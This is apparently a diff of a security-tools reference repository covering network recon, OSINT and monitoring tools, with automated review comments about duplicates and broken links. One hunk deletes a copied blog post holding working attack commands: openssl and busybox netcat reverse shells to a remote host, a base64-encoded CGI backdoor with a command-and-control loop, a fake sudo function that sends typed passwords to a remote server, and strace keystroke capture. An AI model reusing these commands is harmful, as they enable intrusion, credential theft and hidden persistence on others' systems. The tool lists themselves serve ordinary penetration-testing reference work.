* Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway hostdoes not allow the traffic, it will likely drop the packets on the floor and we will see no response. To get the correct IP TTL that will result in expired packets one beyond the gateway we need to ramp up hop-counts. We do this in the same manner that traceroute works. Once we have the gateway hopcount (at that point the scan is said to be `bound`) we can begin our scan.
[CiscoRouter - tool](https://github.com/ajohnston9/ciscorouter)
* CiscoRouter is a tool for scanning Cisco-based routers over SSH. Rules can be created using accompanying CiscoRule application (see this repo) and stored in the "rules" directory.
#### SSH:
[ssh-audit](https://github.com/arthepsy/ssh-audit)
* SSH server auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)
[Knockpy](https://github.com/guelfoweb/knock)
* Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
[sub6](https://github.com/YasserGersy/sub6)
* subdomain take over detector and crawler
[CloudFail](https://github.com/m0rtem/CloudFail)
* CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server.
[AQUATONE](https://github.com/michenriksen/aquatone)
* AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.
[Sublist3r](https://github.com/aboul3la/Sublist3r)
* Fast subdomains enumeration tool for penetration testers
#### SQL:
[Altdns](https://github.com/infosec-au/altdns)
* Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
[SQLMap](https://github.com/sqlmapproject/sqlmap)
* sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
[PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server](https://github.com/NetSPI/PowerUpSQL)
* The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.
* [Documentation](https TLS/SSL Vulnerabilities ://github.com/NetSPI/PowerUpSQL/wiki)
* [Overview of PowerUpSQL](https://github.com/NetSPI/PowerUpSQL/wiki/Overview-of-PowerUpSQL)
#### Netbios
[NbtScan](http://www.unixwiz.net/tools/nbtscan.html)
* This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.
#### SMTP:
#### SNMP:
[Onesixtyone](http://www.phreedom.org/software/onesixtyone/)
* onesixtyone is an SNMP scanner which utilizes a sweep technique to achieve very high performance. It can scan an entire class B network in under 13 minutes. It can be used to discover devices responding to well-known community names or to mount a dictionary attack against one or more SNMP devices.
[SNMPWALK](http://net-snmp.sourceforge.net/docs/man/snmpwalk.html)
* snmpwalk - retrieve a subtree of management values using SNMP GETNEXT requests
#### SIP:
[sipvicious](https://github.com/EnableSecurity/sipvicious)
#### MISC:
[t50 - the fastest packet injector.](https://github.com/fredericopissarra/t50)
* T50 was designed to perform “Stress Testing” on a variety of infra-structure
network devices (Version 2.45), using widely implemented protocols, and after
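Review bot: this hunk re-adds tools that are already listed in the same file, so the list now carries duplicates: UnicornScan (already at the end of the preceding hunk, again as Unicornscan here), CloudFail (twice within this hunk, once in the general list and once under SSH), Onesixtyone and SNMPWALK (general list and again under SNMP), and WhatWeb and webDisco (here and again under Web in the next hunk of this file). Keep one entry per tool, under its protocol heading. The new headings also do not match their contents: the SSH section holds one SSH tool (ssh-audit) followed by subdomain tools (Knockpy, sub6, CloudFail, AQUATONE, Sublist3r), Altdns sits under SQL, SMTP is empty, and Consul is a service-discovery and configuration tool rather than a scanner; a DNS heading for the subdomain tools would resolve most of this. The PowerUpSQL documentation link is broken by stray text pasted into the URL: `[Documentation](https TLS/SSL Vulnerabilities ://github.com/NetSPI/PowerUpSQL/wiki)` should read `[Documentation](https://github.com/NetSPI/PowerUpSQL/wiki)`. Minor: "Additionallty", "hostdoes" and "infra-structure" are typos, and the "Netbios" heading lacks the trailing colon the sibling headings use.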
@ -351,21 +369,35 @@ covering some regular protocols (ICMP, TCP and UDP), some infra-structure
specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP,
EIGRP and OSPF).
[gateway-finder](https://github.com/pentestmonkey/gateway-finder)
* Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.
[a](https://github.com/fmtn/a)
* ActiveMQ CLI testing and message management
[dns-parallel-prober](https://github.com/lorenzog/dns-parallel-prober)
* This script is a proof of concept for a parallelised domain name prober. It creates a queue of threads and tasks each one to probe a sub-domain of the given root domain. At every iteration step each dead thread is removed and the queue is replenished as necessary.
[OnionScan](https://github.com/s-rah/onionscan)
* [What OnionScan Scans for](https://github.com/s-rah/onionscan/blob/master/doc/what-is-scanned-for.md)
[gateway-finder](https://github.com/pentestmonkey/gateway-finder)
* Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.
[enumall](https://github.com/Dhayalan96/enumall)
* Script to enumerate subdomains, leveraging recon-ng. Uses google scraping, bing scraping, baidu scraping, yahoo scarping, netcraft, and bruteforces to find subdomains. Plus resolves to IP.
#### Web:
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[WhatWeb](https://github.com/urbanadventurer/WhatWeb)
* WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
[webDisco](https://github.com/joeybelans/webDisco)
* Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionallty checks for common administrative interfaces and web server misconfigurations.
[w3af](https://github.com/andresriancho/w3af)
* w3af: web application attack and audit framework, the open source web vulnerability scanner.
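Review bot: gateway-finder appears twice in this hunk with the identical description (once before `a` and once after OnionScan); drop one copy. The WhatWeb and webDisco entries under Web duplicate the ones added in the previous hunk of this file; keep them here, where they are correctly categorized, and remove the earlier copies. Typo: "yahoo scarping" in the enumall description.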
@ -422,7 +454,8 @@ EIGRP and OSPF).
[DNS hijacking using cloud providers - Frans Rosén](https://www.youtube.com/watch?v=HhJv8CU-RIk)
[VLAN hopping, ARP Poisoning and Man-In-The-Middle Attacks in Virtualized Environments - Ronny L. Bull - ANYCON 2017](http://www.irongeek.com/i.php?page=videos/anycon2017/110-vlan-hopping-arp-poisoning-and-man-in-the-middle-attacks-in-virtualized-environments-dr-ronny-l-bull)
* Cloud service providers and data centers offer their customers the ability to deploy virtual machines within multi-tenant environments. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. In this talk I will demonstrate the effects of VLAN hopping, ARP poisoning and Man-in-the-Middle attacks across every major hypervisor platform, including results of attacks originating from the physically connected network as well as within the virtual networks themselves. Each attack category that is discussed will be accompanied by a detailed proof of concept demonstration of the attack.


+0 -92 Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt

@ -1,92 +0,0 @@
http://0xthem.blogspot.com/2014/08/getting-busy-at-command-line.html
Reverse SSL Shell:
A simple reverse shell using fifos and openssl s_client. There's a great deal you can do with this tool, take a look at the server options.
mkfifo /tmp/sfd; /bin/bash -i < /tmp/sfd 2>&1 | openssl s_client -quiet -connect <RHOST>:<RPORT> > /tmp/sfd; rm /tmp/sfd
Resurrecting Netcat:
There are plenty of ways (pipes) to resurrect good old netcat, but have you ever looked inside of the nc applet in BusyBox? [-e PROG] is still a valid argument.
busybox nc <RHOST> <RPORT> -e /bin/busybox ash
CGI Shell via BusyBox Httpd:
Ever browse the source of some of the tools on your box? Here's a little cgi shell using the httpd applet in BusyBox.
Httpd Backdoor
mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/
Self-Cleaning CGI Bash Shell
Our backdoor is in the base64 above, and looks like the following.
Maybe we want to restrict access by HTTP method or user agent? We can utilize the env vars passed to the httpd. Might as well clean up after ourselves while we are at it.
#!/bin/bash
if [ "$REQUEST_METHOD" == "HEAD" ] && [ "$HTTP_USER_AGENT" == "nope" ]; then
C=$(base64 -d <<< $QUERY_STRING)
if [ "$C" == "exit" ]; then
echo "Clean"
rm ./p
kill $(pgrep busybox)
fi
echo $(bash -c "$C")
fi
C2
Now whip up a quick loop on our controlling host that meets our triggers.
COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" | ncat <RHOST> <RPORT>; done
RSA Keys as Vars:
Need our httpd cgi shell encrypted? Why not toss some RSA keys into variables via file pipes.
myfullKey=$(openssl genrsa 2048 -outfile)
mypubkey=$(openssl rsa -in <(echo "$myfullKey") -pubout)
To get around key to data size issues, (and be more correct) use these to handle symmetric keys.
I'll leave exact implementation up to you. The point of this post is to inspire ideas, get tinkering!
openssl aes-256-cbc [-d] -pass pass:<symetric_key> -a
Privileged Escalation with Shell Wrappers:
last and history tell us a user logs on frequently and uses the sudo command.
We could use LD_PRELOAD... or simply wrap sudo in a argument expanding function.
We force a sudo timeout, fake an incorrect password entry, send the password encrypted to our server, then issue the user's original command by expanding their arguments.
sudo () { /bin/echo [sudo] password for $USER: ; read -s yoink; openssl s_client -quiet -no_ign_eof -connect <RHOST>:<RPORT> <<<$USER:$yoink 2> /dev/null; echo "Sorry, try again."; /usr/bin/sudo -k; /usr/bin/sudo "$@"; }
Why bother cracking a password when you can have a user type it for you?
This can also be done with an alias. Which can be hidden with control characters (think ^M).
Spy on Stdin by Tracing System Calls:
Need to know what a user is typing in their tty?
sudo strace -f -p <tty_pid> 2>&1 | grep -o -e 'read(., \".*", 1)'
Note: We follow forks with -f in order to grab subprocess and sudo password input.
Fun with stdin Pipes:
Don't want the user to see your sudo wrapper, a command, or specific argument? There are dozens of ways to avoid logging with escapes and sub-shells (mail, gdb, ash).
But what about creating a pipe of standard in?
$(< /dev/stdin)
<anything you want>
^D^D
How could you further hide the process with shell wrappers, aliases, symlinks, exec renames?
What I'm getting at here is, never underestimate the power of leveraging built-in tools in unintended ways.
The Mindset -
For me, this style of thinking is the true sense of "hacking." Learning about an environment or system until you understand what you can make it do, irrespective of what it was intended to do.
Next time you look at a system, environment, or command, ask yourself the following. Does it: create sockets, alter data, read files, elevate privileges, control the flow of data, alter appearances to a user or process, impact commands before or after execution, alter keyboard entry, import anything from anywhere... ? The list and impact is only limited by your creativity.
Enough soap-boxing, have a fun time in Las Vegas! Be safe.
Go learn something...
@ThemsonMester
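Review bot: this deletion drops the source link on the file's first line (http://0xthem.blogspot.com/2014/08/getting-busy-at-command-line.html) without re-adding it in any other hunk shown in this diff; if the intent is to replace the copied article with a reference, add the link with a one-line description to the relevant section of Network Attacks & Defenses.md so the pointer survives. Removing the verbatim copy itself is the right call: the file reproduced a third-party blog post in full, whereas the rest of these pages cite sources as a link plus a short description.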

+8 -0 Draft/Network Security Monitoring & Logging.md

@ -20,6 +20,8 @@ Cull
##### To Do
* Create incident Response section
* Break out Threat hunting stuff
* Break out Logging stuff into "logging" for system specific logging
#### Cull
[laikaboss](https://github.com/lmco/laikaboss)
@ -30,6 +32,12 @@ http://www.netfort.com/wp-content/uploads/PDF/WhitePapers/NetFlow-Vs-Packet-Anal
[Response Operation Collections Kit Reference Build](https://github.com/rocknsm/rock)
[Stenographer](https://github.com/google/stenographer/blob/master/README.md)
* Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
[Netdude](http://netdude.sourceforge.net/)
* The Network Dump data Displayer and Editor is a framework for inspection, analysis and manipulation of tcpdump trace files. It addresses the need for a toolset that allows easy inspection, modification, and creation of pcap/tcpdump trace files. Netdude builds on any popular UNIX-like OS, such as Linux, the BSDs, or OSX.


+93 -55 Draft/Open Source Intelligence.md

@ -21,6 +21,8 @@ http://toddington.com/resources/
www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
#### End cull
@ -84,7 +86,10 @@ www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
[How to Use Python to Spy on Your Friends: Web APIs, Recon ng, & OSINT](https://www.youtube.com/watch?v=BOjz7NfsLpA)
[ZOMG Its OSINT Heaven Tazz Tazz](https://www.youtube.com/watch?v=cLmEJLy7dv8)
[Practical OSINT - Shane MacDougall](https://www.youtube.com/watch?v=cLmEJLy7dv8)
* There’s more to life to OSINT than google scraping and social media harvesting. Learn some practical methods to automate information gathering, explore some of the most useful tools, and learn how to recognize valuable data when you see it. Not only will we explore various tools, attendees will get access to unpublished transforms they can use/modify for their own use.
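Review bot: the two new video entries point at the same URL, https://www.youtube.com/watch?v=cLmEJLy7dv8, for both "ZOMG Its OSINT Heaven Tazz Tazz" and "Practical OSINT - Shane MacDougall"; at least one of the links is wrong, so verify and correct it before merging.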
@ -99,110 +104,143 @@ www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
Reference Site: http://osintinsight.com/shared.php?expand=169,175&folderid=0&user=Mediaquest
[TheHarvester](From: https://code.google.com/p/theharvester/)
* Description: The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
[Maltego](https://www.paterva.com/web6/products/maltego.php)
* Description: What you use to tie everything together.
[MetaGooFil](https://code.google.com/p/metagoofil/)
* Description: Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target company. The tool will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner and others. With the results it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase.
[Gitrob](
* [Blog post](http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/)
* Gitrob is a command line tool that can help organizations and security professionals find such sensitive information. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.
[PowerMeta](https://github.com/dafthack/PowerMeta)
* PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.
[Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* Description: Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
[DataSploit](https://github.com/DataSploit/datasploit)
A tool to perform various OSINT techniques, aggregate all the raw data, and give data in multiple formats.
[OSINT Mantra](http://www.getmantra.com/hackery/osint.html)
[blacksheepwall](https://github.com/tomsteele/blacksheepwall)
* blacksheepwall is a hostname reconnaissance tool
[SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/#searchdiggity)
* Description: SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project. It is Bishop Fox’s MS Windows GUI application that serves as a front-end to the most recent versions of our Diggity tools: GoogleDiggity, BingDiggit, Bing LinkFromDomainDiggity, CodeSearchDiggity, DLPDiggity, FlashDiggity, MalwareDiggity, PortScanDiggity, SHODANDiggity, BingBinaryMalwareSearch, NotInMyBackYard Diggity
[Oryon C Portable](http://osintinsight.com/oryon.php)
* Oryon C Portable is a web browser designed to assist researchers in conducting Open Source Intelligence investigations. Oryon comes with dozens of pre-installed tools and a select set of links cataloged by category – including those that can be found in the OI Shared Resources.
[Maltego](https://www.paterva.com/web6/products/maltego.php)
* Description: What you use to tie everything together.
[Creepy.py](http://ilektrojohn.github.io/creepy/)
* Description: Creepy is a geolocation OSINT tool. Gathers geolocation related information from online sources, and allows for presentation on map, search filtering based on exact location and/or date, export in csv format or kml for further analysis in Google Maps.
[OpenRefine](https://github.com/OpenRefine/OpenRefine)
* Description: OpenRefine is a power tool that allows you to load data, understand it, clean it up, reconcile it to master database, and augment it with data coming from Freebase or other web sources. All with the comfort and privacy of your own computer.
[Metashield Analyzer](https://metashieldanalyzer.elevenpaths.com/)
* Description: Metadata documents can help a malicious user to obtain information that is beyond our control in an enterprise environment. Metashield Analyzer is an online service that allows easily check if your office documents contain metadata.
[Tinfoleak](http://vicenteaguileradiaz.com/tools/)
* tinfoleak is a simple Python script that allow to obtain:
..* basic information about a Twitter user (name, picture, location, followers, etc.)
..* devices and operating systems used by the Twitter user
..* applications and social networks used by the Twitter user
..* place and geolocation coordinates to generate a tracking map of locations visited
..* show user tweets in Google Earth!
..* download all pics from a Twitter user
..* hashtags used by the Twitter user and when are used (date and time)
..* user mentions by the the Twitter user and when are occurred (date and time)
..* topics used by the Twitter user
[Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* Description: Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
[Creepy.py](http://ilektrojohn.github.io/creepy/)
* Description: Creepy is a geolocation OSINT tool. Gathers geolocation related information from online sources, and allows for presentation on map, search filtering based on exact location and/or date, export in csv format or kml for further analysis in Google Maps.
[OSINT OPSEC Tool](https://github.com/hyprwired/osint-opsec-tool)
* Description: The OSINT OPSEC Tool monitors multiple 21st Century OSINT sources real-time for keywords, then analyses the results, generates alerts, and maps trends of the data, finding all sorts of info people probably don't want others to see...
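Review bot: three tools are listed twice in this hunk with identical descriptions: Maltego, Recon-ng and Creepy.py each appear once near the top of the list and again after Oryon C Portable and Tinfoleak; remove one copy of each. Two markdown links are malformed: `[TheHarvester](From: https://code.google.com/p/theharvester/)` has "From: " inside the link target, and `[Gitrob](` has no target and never closes (the project URL is not in the diff, so it has to be supplied). The Tinfoleak sub-list uses `..*` as its bullet, which renders literally; indent the items with spaces and use `*`. The DataSploit description also lacks the leading `* ` that every other description uses.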